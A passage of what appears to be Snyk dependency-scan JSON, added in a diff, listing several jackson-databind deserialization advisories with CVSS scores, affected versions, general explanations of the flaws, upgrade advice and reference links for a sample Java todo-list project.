to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. 
These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.10 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e8f043d1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1680)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1737)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1506612)\n", + "epssDetails": { + "percentile": "0.92802", + "probability": "0.04801", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-15095" + ], + "CWE": [ + "CWE-184" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2017-11-07T13:13:32.343000Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.10)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-06-26T21:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + 
"level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2017-11-09T03:13:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:46.857906Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Imre Rad" + ], + "semver": { + "vulnerable": [ + "[,2.8.11)", + "[2.9.0,2.9.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.8.11", + "2.9.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1855", + "title": "GitHub Issue" + }, + { + "url": 
"https://github.com/irsl/jackson-rce-via-spel/", + "title": "PoC Project" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:06.545272Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:58.597489Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.686860Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:06.545272Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:58.597489Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). 
This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the Spring libraries are available in the classpath.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1855)\n- [PoC Project](https://github.com/irsl/jackson-rce-via-spel/)\n", + "epssDetails": { + "percentile": "0.95701", + "probability": "0.13977", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-17485" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-01-11T11:41:28.547000Z", + "functions_new": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": 
"2018-01-10T11:41:28Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-01-22T12:30:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:58.597489Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32044", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Rui Chong" + ], + "semver": { + "vulnerable": [ + "[,2.8.11)", + "[2.9.0,2.9.4)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.8.11", + "2.9.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05", + "title": "GitHub Commit" + }, + 
{ + "url": "https://github.com/FasterXML/jackson-databind/issues/1899", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:48.440088Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:59.857985Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:07.715996Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:48.440088Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:59.857985Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) and [CVE-2017-17485](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043)). 
This is exploitable via two different gadgets that bypass a blacklist.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. 
These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n## References\n- [GitHub Commit](https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1899)\n", + "epssDetails": { + "percentile": "0.94704", + "probability": "0.09270", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-5968" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-w3f4-3q6j-rh82" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-01-22T15:40:18.105000Z", + "functions_new": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-01-18T15:40:18Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", 
+ "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-01-23T13:17:24Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:59.857985Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32111", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.5)", + "[2.7.0, 2.8.11.1)", + "[2.9.0, 2.9.5)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.6.7.5", + "2.8.11.1", + "2.9.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11.1)", + "[2.9.0,2.9.5)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1931", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:58.671582Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:49.486075Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.859910Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:58.671582Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:49.486075Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the `c3p0` libraries are available in the classpath.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.5, 2.8.11.1, 2.9.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1931)\n", + "epssDetails": { + "percentile": "0.99133", + "probability": "0.93631", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-7489" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cggj-fvv3-cqwv" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-02-26T15:13:40.723000Z", + "functions_new": [ + { + "version": [ + "[,2.8.11.1)", + "[2.9.0,2.9.5)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-02-10T15:13:40Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": 
"2018-02-26T15:13:40Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.486075Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450207", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.9.1", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.9, + "functions": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2341", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/Al1ex/CVE-2019-12814", + "title": "PoC Repository" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 5.9, + 
"modificationTime": "2024-03-11T09:53:36.647712Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:50.077144Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:15.371549Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:36.647712Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:50.077144Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x through 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has JDOM 1.x or 2.x jar in the classpath, an attacker can send a specifically crafted JSON message that allows them to read arbitrary local files on the server.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2341)\n- [PoC Repository](https://github.com/Al1ex/CVE-2019-12814)\n", + "epssDetails": { + "percentile": "0.87218", + "probability": "0.01539", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-12814" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cmfg-87vq-g5g4" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-06-19T15:28:46.421239Z", + "functions_new": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": 